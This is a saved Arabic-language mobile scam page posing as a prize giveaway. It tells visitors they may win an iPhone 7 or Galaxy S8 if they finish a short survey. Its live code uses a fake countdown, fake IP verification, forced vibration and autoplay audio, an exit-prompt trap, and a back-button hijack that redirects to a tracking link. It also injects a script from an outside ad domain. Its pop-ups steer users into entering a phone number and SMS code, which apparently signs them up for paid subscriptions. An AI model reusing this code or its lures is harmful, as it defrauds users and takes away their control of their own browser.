<!DOCTYPE html>
<!-- saved from url=(0172)http://getyourprize.today/l/wwh/c33/index.html?city=Ramallah&bemobdata=c%3D66dcca3b-5c69-44fd-acf5-d172c9b99f20..a%3D0..b%3D0..e%3D389305803303..c1%3D1407888..c2%3D984238#b -->
<html dir="rtl"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <!--<base href=""><base href=".">-->

  




<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
<meta name="viewport" content="width=device-width">
<meta http-equiv="cleartype" content="on">
<title>
تهانينا 
</title>
<script type="text/javascript" async src="./G_Q_files/d99fa40f22d93ab771a7a07d8c4e7d60b62df67e"></script><script type="text/javascript" async src="./G_Q_files/d99fa40f22d93ab771a7a07d8c4e7d60b62df67e(1)"></script><script>
function getURLParameter(name) {
return decodeURI(
(RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || ''
);
}
</script>
<script src="./G_Q_files/jquery.min.js"></script>
<script type="text/javascript">
        navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
        navigator.vibrate([1000, 500, 1000, 500]);    
</script>

<script type="text/javascript">
var monthNames = new Array("Jan.","Feb.","March","April","May","June","Juli","Aug.","Sep.","Oct.","Nov.","Dec.");
var now = new Date();
now.setDate(now.getDate() + 1);
var nowStringTommorow = monthNames[now.getMonth()] + " " + now.getDate() + "," + now.getFullYear();
</script>
<script type="text/javascript">
var CountDown = {
end: 3,
curr: 33,
display_ele: '',
}
CountDown.startit = function() {
var time_between = Math.floor((Math.random() * 1000) + 1500);
var t = setTimeout('CountDown.countdown()', time_between);
}
CountDown.countdown = function() {
if(CountDown.curr != CountDown.end) {
CountDown.curr = CountDown.curr - 1;
if(CountDown.display_ele) {
CountDown.display_ele.text(CountDown.curr);
}
var time_between = Math.floor((Math.random() * 1000) + 1500);
var t = setTimeout('CountDown.countdown()', time_between);
}
}
$(document).ready(function() {
setInterval(function() {
$("h1").toggle();
}, 1500);
$("#q1 .answer").click(function() {
$("#q1").hide(0, function() {
$("#q2").fadeIn();
});
});
$("#q2 .answer").click(function() {
$("#tq2").hide();
$("#q2").hide(0, function() {
$("#q3").fadeIn();
});
});
$("#q3 .answer").click(function() {
$(".form_questions").hide(0, function() {
$(".validate").show();
$("#v0a").fadeIn();
$("#v1a").fadeIn();
$("#v1b").fadeIn();
});
setTimeout(function() {
$("#v1a").hide();
$("#v1b").hide();
$("#v1c").show();
$("#v1d").show();
$("#v2a").show();
$("#v2b").show();
}, 2000);
setTimeout(function() {
$("#v2a").hide();
$("#v2b").hide();
$("#v2c").show();
$("#v2d").show();
$("#v3a").show();
$("#v3b").show();
}, 4500);
setTimeout(function() {
$("#v3a").hide();
$("#v3b").hide();
$("#v3c").show();
$("#v3d").show();
$("#vfinal").show();
$("#v0a").hide();
$("#v0b").show();
}, 6500);
setTimeout(function() {
$("#v4").show();
$("#v4s").show();
$(".reviews").show();
}, 6500);
});
});
</script>
<script>
!function(t,e){for(var n,r,s={utm_campaign:"backbutton",cid:"",1:"",2:"",3:"",4:"",5:""},a=t.location.search.substr(1).split("&"),c=[];a.length;)r=a.shift(),n=r.split("=")[0],s.hasOwnProperty(n)&&(c.push(r),delete s[n]);for(n in s)s.hasOwnProperty(n)&&c.push(n+"="+encodeURIComponent(s[n]));c.length&&(e+=(/\?/.test(e)?"&":"?")+c.join("&"));var i=t.createElement("script");i.type="text/javascript",i.async=!0,i.src=e;var o=t.getElementsByTagName("script")[0];o.parentNode.insertBefore(i,o)}(document,"http://free.mawlodi.com/ad3/d99fa40f22d93ab771a7a07d8c4e7d60b62df67e");
</script>
<style>
html {
font-family: sans-serif;
font-color: #000;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
}
body {
margin: 0;
background: #eeeeee;
min-width: 320px;
color: #000
}
h1,
h2,
h3,
h4,
h5,
h6,
p,
div,
span,
a,
ul,
ol,
li {
margin: 0px;
padding: 0px;
}
a{
text-decoration:none;
color:#4485f6;
}
h3{
color:#212121;
}
p {
color:#737373;
}
#q2, #q3,
#v1b, #v1c,
#v2b, #v2c,
#v3c, #v3b, #v4s, #vfinal, .validate, .prize {
display: none;
}
.header{
background-color:#f1f1f1;
width:100%;
padding:6px 0;
}
.header p{
color:#fff;
opacity:0.5;
font-size:medium;
line-height:0;
}
.header table{
border-collapse:collapse;
}
.wrapper{
max-width:800px;
width:96%;
margin:0 auto;
}
.subheader{
background-color:#689f38;
width:100%;
border-bottom:1px solid #cbccd0;
}
.subheader table,tr,td{
border-collapse:collapse;
padding:8px 0px 4px 0px;
}
.subheader td{
valign:middle;
}
.subheader img{
}
.spacer{
height:20px;
}
.contestwrap{
width:100%;
background-color:#fff;
border-bottom:1px solid #e5e5e5;
-moz-box-shadow:    0px 0px 2px 2px #d2d2d2;
-webkit-box-shadow: 0px 0px 2px 2px #d2d2d2;
box-shadow:         0px 0px 2px 2px #d2d2d2;
padding:10px 0px 4px 0px;
border-radius:3px;
}
.toptext{
color:#212121;
font-size:small;
}
.contestwrap table{
border-collapse:collapse;
}
.contestwrap p{
color:#776161;
font-size:small;
}
.select2{
color:#737373;
font-size:small;
font-weight:300;
padding:8px 0px 4px 0px;
}
.form_questions {
width:100%;
background-color:#fff;
border-bottom:1px solid #e5e5e5;
-moz-box-shadow:    0px 0px 2px 2px #d2d2d2;
-webkit-box-shadow: 0px 0px 2px 2px #d2d2d2;
box-shadow:         0px 0px 2px 2px #d2d2d2;
padding:10px 0px 30px 0px;
border-radius:3px;
}
.answer {
border: 0px solid #334c83;
padding: 10px 0 10px 0;
width: 80%;
display: inline-block;
margin: 5px 5px 5px 5px;
text-align: center;
font-size: medium;
font-weight: 300;
color: #fff;
background: #3b5998;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
background: #689f38;
cursor:pointer;
}
form_questions h3 {
text-align: center;
color: #000;
font-size: large;
padding: 5px;
}
.question {
text-align: center;
padding-top:20px;
}
.h4 {
font-size: medium;
font-weight: normal;
color: #ff9903;
}
.validate {
width:100%;
background-color:#fff;
border-bottom:1px solid #e5e5e5;
-moz-box-shadow:    0px 0px 2px 2px #d2d2d2;
-webkit-box-shadow: 0px 0px 2px 2px #d2d2d2;
box-shadow:         0px 0px 2px 2px #d2d2d2;
padding:0px;
border-radius:3px;
}
#szlider{
width:100%;
height:4px;
overflow:hidden;
background: #dadada;
}
#szliderbar{
width:0%;
height:4px;
background: #689f38;
}
#szazalek{
color:#858585;
font-size:small;
}
.prize{
width:100%;
}
.pbox{
background-color:#fff;
border-bottom:1px solid #e5e5e5;
-moz-box-shadow:    0px 0px 2px 2px #d2d2d2;
-webkit-box-shadow: 0px 0px 2px 2px #d2d2d2;
box-shadow:         0px 0px 2px 2px #d2d2d2;
padding:10px 6px;
border-radius:3px;
overflow:hidden;
cursor:pointer;
position:relative;
}
.pbox img{
width:130px;
display: block;
margin-left: auto;
margin-right: auto;
}
.pbox h2{
display: block;
font-size:xlarge;
font-weight:300;
margin:6px 6px 0px 6px;
text-align:left;
}
.pbox p{
display: block;
font-size:small;
margin:6px 6px 0px 6px;
text-align:left;
}
.boxwrapper{
width:100%;
}
.prizebtn {
border: 0px solid #334c83;
padding: 4px 0 4px 0;
width: 100%;
display: inline-block;
margin: 8px 4px 4px 4px;
text-align: center;
font-size: 0.9em;
font-weight: 300;
color: #fff;
background: #3b5998;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
border-radius: 3px;
background: #689f38;
}
.prize h3{
font-size:1.5em;
font-weight:300;
padding:5px 0px 5px;
text-align:center;
}
.prize h2{
font-size:1.2em;
font-weight:300;
text-align:left;
}
.reviews{
width:100%;
background-color:#fff;
border-bottom:1px solid #e5e5e5;
-moz-box-shadow:    0px 0px 2px 2px #d2d2d2;
-webkit-box-shadow: 0px 0px 2px 2px #d2d2d2;
box-shadow:         0px 0px 2px 2px #d2d2d2;
padding:0px;
border-radius:3px;
}
hr{
opacity:0.2;
}
.reviews .name{
font-weight: bold;
color:#333333;
}
.reviews .text{
padding-top: 5px;
color:#555555;
font-style:italic;
}
.reviews .date{
padding-top: 5px;
color: #888a89;
font-size: 10px;
}
.reviews table{
padding-top: 10px;
font-size: small;
padding:0px;
}
.roundimg{
border-radius:50%;
width:50px;
}
.reviews h2{
font-size:1.2em;
font-weight:300;
padding:20px 0px 5px;
}
.reviews hr{
opacity:0;
}
.commentpad{
padding-left:10px;
}
.fix-bar{
	background: #689f38;
	border-bottom: 1px solid #4ea93f;
	color:#fff;
	font-weight:600;
	font-size:12px;
	padding:6px 0px;
	text-align:center;
	position:fixed;
	z-index:9999;
	top:0;
	left:0;
	width:100%;
}
.top-bar{
	background: #689f38;
	border-bottom: 1px solid #4ea93f;
	color:#fff;
	font-weight:600;
	font-size:12px;
	padding:6px 0px;
	text-align:center;
	width:100%;
}
.this1,.this2,.this3 {
	display:inline-block;
	opacity:0;
	position:absolute;
	top:10px;
	left:30px;
}
#chest1,#chest2,#chest3 {
	cursor:pointer;
	position:relative;
	height:120px;
	width:80px;
	background:url('chest-close.jpg') center bottom no-repeat
}
#cta-btn1,#cta-btn2,#cta-btn3,#open1,#open2,#open3 {
	display:inline-block;
	cursor:pointer;
	font-weight:600;
	padding:6px 0px;
	width:90%;
	font-size:14px;
	background:#689F38;
	color:#ffffff;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;border-radius: 3px;
}
#cta-btn1,#cta-btn2,#cta-btn3 {
	display:none;
}
</style>
    
    <script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>

</head>
<!--<body onload=" initialize();">-->
<body style="">
<audio autoplay preload=""> <source src="http://getyourprize.today/audio/tahnina/tahnina-sh.mp3" type="audio/mpeg"> </audio>
<div class="fix-bar">
تهانينا عزيزي الزائر!</div>
<div class="top-bar">
تهانينا عزيزي الزائر!
</div>
<div class="header">
<table class="wrapper">
<tbody><tr>
<td width="30px"></td>
<td align="right" width="60px"><img src="./G_Q_files/icon-right.png"></td>
</tr>
</tbody></table>
</div>
<div class="subheader">
<table class="wrapper">
<tbody><tr>
<td align="center" width="40px">&nbsp;</td>
<td align="left">&nbsp;</td>
</tr>
</tbody></table>
</div>
<div class="spacer"></div>
<div class="wrapper">
<div class="contestwrap wrapper">
<div class="toptext">
<table class="wrapper">
<tbody>
<tr>
<td align="right" valign="top" width="42px"><img src="./G_Q_files/logo.png"></td>
<td align="right" valign="top"><b>
 لديك فرصه للاشتراك على خدماتنا والدخول على السحب على جوائز قيمه

</b><br>
<font style="color:#9fa2a6;font-size:x-small;">
<script>
var mydate=new Date()
mydate.setDate(mydate.getDate()-0);
var year=mydate.getYear()
if (year < 1000)
year+=1900
var day=mydate.getDay()
var month=mydate.getMonth()
var daym=mydate.getDate()
if (daym<10)
daym="0"+daym
var dayarray=new Array("الأحد","الإثنين","الثلاثاء","الأربعاء","الخميس","الجمعة","سبت")
var montharray=new Array("يناير","فبراير","مارس","أبريل","مايو","يونيو","يوليوز","أغسطس","سبتمبر","أكتوبر","تشرين الثاني","ديسمبر")
document.write("" + montharray[month] + " " + daym + "")
</script>تشرين الثاني 24 في الساعة 00:03.</font></td>
</tr>
</tbody>
</table>
<div style="border-bottom:1px solid #ccc;">
<p class="wrapper"> هاتف  الخاص بك لديه فرصه كبيره للاشتراك على خدماتنا والدخول على السحب على العديد من الجوائز<br>
  <br>
</p>
<div>
لديك فرصه لرربح احد هذه الاجهزه <b>Samsung Galaxy S8</b> و <b>iPhone 7</b>.</div>
<br>
<br>
هل انت مهتم بالاشتراك والدخول على السحب , اذا كل ما عليك هو تجيب عن هذا الاستبان 
لكي نعرف توجهات مشتركينا <br>
 

<br>
<br>
<p></p>
</div>

<div class="select2 wrapper">
لديك فقط 
<font color="red"><b><span id="mins">1</span> 
دقائق
<span id="hsecs">55</span> 
ثواني
</b></font>  تعبئه هذا الاستبيان قبل أن يبدأ شخص آخر بأخذ مكانك. حظا طيبا!
</div>
</div>
</div>
<div class="spacer"></div>
<div class="form_questions wrapper">
<div class="question wrapper" id="q1">
<h3><span style="font-weight:300;">
السؤال 1 من 3 :
</span><br>
ما نوع الجهاز الذي تفضله 
<br></h3>
<br>
<span class="answer">سامسونج </span>
<span class="answer">ايفون </span>
<span class="answer">ال جي </span>
</div>
<div class="question wrapper" id="q2">
<h3><span style="font-weight:300;">
السؤال 2 من 3 : 
</span><br>
ما نوع الخدمات التي تفضلها 
<br></h3>
<br>
<span class="answer">ترفيه</span>
<span class="answer">اخباريه</span>
<span class="answer">دينيه</span>
<!--
USA
England
Russland
-->
</div>
<div class="question wrapper" id="q3">
<h3><span style="font-weight:300;">
السؤال 3 من 3 : 
</span><br>
ما نوع المحتوى المفضل لديك 
<br></h3>
<br>
<span class="answer" onclick="drawszlider(10,0);">فيديوهات  </span>
<span class="answer" onclick="drawszlider(10,0);">روابط محتوى </span>
<span class="answer" onclick="drawszlider(10,0);">رسائل قصيره</span>
</div>
</div>
<div class="validate wrapper">
<div class="wrapper">
<br>
<table width="100%">
<tbody><tr>
<td align="left">
<p id="v1b">
الرجاء الانتظار
</p>
<p id="v2b">
التحقق من بروتوكول الانترنت الخاص بك ...
</p>
<p id="v3b">
سيتم تحويلك الى الى صفحه الاشتراك بالخدمة والدخول على السحب</p>
<p id="vfinal">
 
</p>
</td>
<td align="right"><span id="szazalek">0%</span></td>
</tr>
</tbody></table>
<div style="width:100%;margin:0 auto;">
<div id="szlider">
<div id="szliderbar">
</div>
<div id="szazalek">
</div>
</div>
</div>
<table>
<tbody><tr>
<td width="40px"><img id="v1a" src="./G_Q_files/loading.gif"><img id="v1c" src="./G_Q_files/fb-check.jpg"></td>
<td><p id="v1d">
أجبت الثلاث أسئلة (3/3)!
</p></td>
</tr>
<tr>
<td><img id="v2a" src="./G_Q_files/loading.gif"><img id="v2c" src="./G_Q_files/fb-check.jpg"></td>
<td><p id="v2d">
لا توجد أي مشاركة سابقة على عنوان بروتوكول الانترنت هذا.</p></td>
</tr>
<tr>
<td><img id="v3a" src="./G_Q_files/loading.gif"><img id="v3c" src="./G_Q_files/fb-check.jpg"></td>
<td> </td>
</tr>
</tbody></table>
<br>
</div>
</div>
<script>
var slidewhere = 0;
var holvanszlider = 0;
function drawszlider(ossz,meik){
var szazalek = Math.round((meik*100)/ossz);
document.getElementById("szliderbar").style.width=szazalek+"%";
document.getElementById("szazalek").innerHTML=szazalek+"%";
holvanszlider = meik;
t = setTimeout("drawszlider(100, slidewhere);slidewhere = holvanszlider + 1; if (slidewhere > 100) {slidewhere = 100;}",62);
}
</script>
<div class="spacer" id="v4s"></div>
<div class="prize wrapper" id="v4">
<h3>
الجوائز المتاحه لك للدخول على السحب هي :
</h3>
<center><table width="100%" style="max-width:400px;">
<tbody>

<tr>
<td style="padding:0 33px;" align="center" id="chest1" onclick="chest1()">
<div class="this1">
<img id="img1" src="./G_Q_files/iphone6-b.png">
</div>
</td>
<td align="center">
<p id="pz1"><b>جائزة A</b></p>
<div id="open1" onclick="chest1()">
افتح
</div>
<a href="http://trk.rewardroom.club/click" id="cta-btn1" onclick="exit_a();PreventExitPop = false">
متاح , اضغط هنا للاشتراك والدخول على السحب
</a>
</td>   
</tr>
<!--
<tr>
<td style="padding:0 33px;" align="center" id="chest1" onclick="chest1()">
<div class="this1">
<img id="img1" src="./G_Q_files/iphone6-b.png">
</div>
</td>
<td align="center">
<p id="pz1"><b>جائزة A</b></p>
<div id="open1" onclick="chest1()">
افتح
</div>
<a href="http://trk.rewardroom.club/click" id="cta-btn1" onclick="exit_a();PreventExitPop = false">
متاح (احصل عليه مجانا)
</a>
</td>   
</tr>
-->



<!--

<tr>
<td style="padding:0 33px;" align="center" id="chest2" onclick="chest2()">
<div class="this2">
<img id="img2" src="./G_Q_files/iphone6-b.png">
</div>
</td>
<td align="center">
<p id="pz2"><b>جائزة B</b></p>
<div id="open2" onclick="chest2()">
افتح
</div>
<a href="http://trk.rewardroom.club/click" id="cta-btn2" onclick="exit_a();PreventExitPop = false">
متاح (احصل عليه مجانا)
</a>
</td>
</tr>
<tr>
<td style="padding:0 33px;" align="center" id="chest3" onclick="chest3()">
<div class="this3">
<img id="img3" src="./G_Q_files/iphone6-b.png">
</div>
</td>
<td align="center">
<p id="pz3"><b>جائزة C</b></p>
<div id="open3" onclick="chest3()">
افتح
</div>
<a href="http://trk.rewardroom.club/click" id="cta-btn3" onclick="exit_a();PreventExitPop = false">
متاح (احصل عليه مجانا)
</a>
</td>
</tr>





-->

</tbody></table></center>
</div>	
<div class="spacer"></div>	

</div>
<div style="height:40px;"></div>
<img width="0px" height="0px" src="./G_Q_files/chest-open.jpg">
<img width="0px" height="0px" src="./G_Q_files/chest-close.jpg">
<img width="0px" height="0px" src="./G_Q_files/s7-b.png">
<img width="0px" height="0px" src="./G_Q_files/ps4.png">
<!--onclick teasure chest-->
<script language="JavaScript" type="text/javascript">
var prize123 = true;
var audio = new Audio('alert.mp3');
function chest1() {
if(prize123 == true) {
audio.play();
document.getElementById("pz1").innerHTML ="<br><b>أيفون ٧ جديد</b>";
//document.getElementById("pz2").innerHTML ="<br><b>Playstation 4</b>";
//document.getElementById("pz3").innerHTML ="<br><b>Samsung S7</b>";
document.getElementById("img1").src = "iphone6-b.png";
//document.getElementById("img2").src = "ps4.png";
//document.getElementById("img3").src = "s7-b.png";
document.getElementById('chest1').style.background='url(chest-open.jpg) center bottom no-repeat';
//document.getElementById('chest2').style.opacity = "0.5";
//document.getElementById('chest3').style.opacity = "0.5";
$(".this1").animate({opacity: "1"}, 2000);
//$(".this2").animate({opacity: "1"}, 2000);
//$(".this3").animate({opacity: "1"}, 2000);
document.getElementById('cta-btn1').style.display = "inline-block";
document.getElementById('open1').style.display = "none";
//document.getElementById('open2').style.display = "none";
//document.getElementById('open3').style.display = "none";
prize123 = false;
}
}
function chest2() {
if(prize123 == true) {
audio.play();
document.getElementById("pz2").innerHTML ="جائزتك<br><b>أيفون ٧ جديد</b>";
document.getElementById("pz1").innerHTML ="<br><b>Playstation 4</b>";
document.getElementById("pz3").innerHTML ="<br><b>Samsung S7</b>";
document.getElementById("img2").src = "img/iphone6-b.png";
document.getElementById("img1").src = "img/ps4.png";
document.getElementById("img3").src = "img/s7-b.png";
document.getElementById('chest2').style.background='url(img/chest-open.jpg) center bottom no-repeat';
document.getElementById('chest1').style.opacity = "0.5";
document.getElementById('chest3').style.opacity = "0.5";
$(".this1").animate({opacity: "1"}, 2000);
$(".this2").animate({opacity: "1"}, 2000);
$(".this3").animate({opacity: "1"}, 2000);
document.getElementById('cta-btn2').style.display = "inline-block";
document.getElementById('open1').style.display = "none";
//document.getElementById('open2').style.display = "none";
//document.getElementById('open3').style.display = "none";
prize123 = false;
}
}
function chest3() {
if(prize123 == true) {
audio.play();
document.getElementById("pz1").innerHTML ="<br><b>Samsung S7</b>";
document.getElementById("pz2").innerHTML ="<br><b>Playstation 4</b>";
document.getElementById("pz3").innerHTML ="جائزتك<br><b>أيفون ٧ جديد</b>";
document.getElementById("img1").src = "s7-b.png";
document.getElementById("img2").src = "ps4.png";
document.getElementById("img3").src = "iphone6-b.png";
document.getElementById('chest3').style.background='url(chest-open.jpg) center bottom no-repeat';
document.getElementById('chest2').style.opacity = "0.5";
document.getElementById('chest1').style.opacity = "0.5";
$(".this1").animate({opacity: "1"}, 1000);
$(".this2").animate({opacity: "1"}, 1000);
$(".this3").animate({opacity: "1"}, 1000);
document.getElementById('cta-btn3').style.display = "inline-block";
document.getElementById('open1').style.display = "none";
document.getElementById('open2').style.display = "none";
document.getElementById('open3').style.display = "none";
prize123 = false;
}
}
</script>
<!--onclick option 1-->
<script language="JavaScript" type="text/javascript">
function exit_a() {
alert(" *** كيفية الاشتراك والدخول على السحب ***\n\n1. أدخل رقم هاتفك وأدخل معلومات كاملة بك في الصفحة التالية  للتأكد من هويتك \n\n2. بعد ذلك أدخل الكود السري الذي سيصلك عبر رسالة نصية  .\n\n3. استكمال الخطوات المطلوبة للاشتراك  .");
}
</script>
<script language="JavaScript" type="text/javascript">
function exit_b() {
//alert("تم حجز الأيفون 7 الخاص بك: \n\n*** كيفية الحصول على جائزتك ***\n\n1. أدخل رقم هاتفك وأدخل معلومات كاملة بك في الصفحة التالية (100٪ مجانا) للتأكد من هويتك \n\n2. بعد ذلك أدخل الكود السري الذي سيصلك عبر رسالة نصية من أجل استلام جائزتك .\n\n3. استكمال الخطوات المطلوبة للحصول على جائزتك .");}
</script>
<!--onclick option 2-->
<script language="JavaScript" type="text/javascript">
function exit_c() {
//alert("للاسف, هذه الجائزة ليست متوفرة.\n\nالرجاء اختيار جائزة أخرى.");
}
</script>
<!--welcome pop-up-->
<script type="text/javascript">
 alert("تهانينا \n\n لقد تم اختيارك لتكون من بين الأشخاص القلائل الأوائل الحاصلين  فرصه الاشتراك بخدماتنا و فرصة الفوز بهدية قيمة \n\nالرجاء تأكيد أنك صاحب هاتف عن طريق النقر على موافق."); 
</script>
<!--on exit-->
<script language="javascript">
var PreventExitPop = true;
function ExitPop() {
if(PreventExitPop != false) {
return "انتظر! لا تزال هناك (2) جوائز متاحة! الرجاء الاختيار بينهم لاستلام الجائزة!!"
}
}
window.onbeforeunload = ExitPop;
</script>
<!--backfix-->
<script type="text/javascript" src="./G_Q_files/backfix.min.js"></script>
<script type="text/javascript">
bajb_backdetect.OnBack = function() {
window.history.back = function() {
document.location = 'http://trk.rewardroom.club/click'
}
}
</script>
<script type="text/javascript">
setInterval(function() {
var mins = parseInt(document.getElementById("mins").innerHTML);
var secs = parseInt(document.getElementById("hsecs").innerHTML);
if(mins != 0 && secs == 0) {
nmins = mins - 1;
nsecs = 59;
} else if(mins != 0 || secs != 0) {
nmins = mins;
nsecs = secs - 1;
} else if(mins == 0 && secs == 0) {
nmins = mins;
nsecs = secs;
}
document.getElementById("mins").innerHTML = nmins;
document.getElementById("hsecs").innerHTML = nsecs;
if(nsecs < 10) nsecs = "0" + nsecs;
document.getElementById("hsecs").innerHTML = nsecs;
}
, 1000);
</script>
</body></html>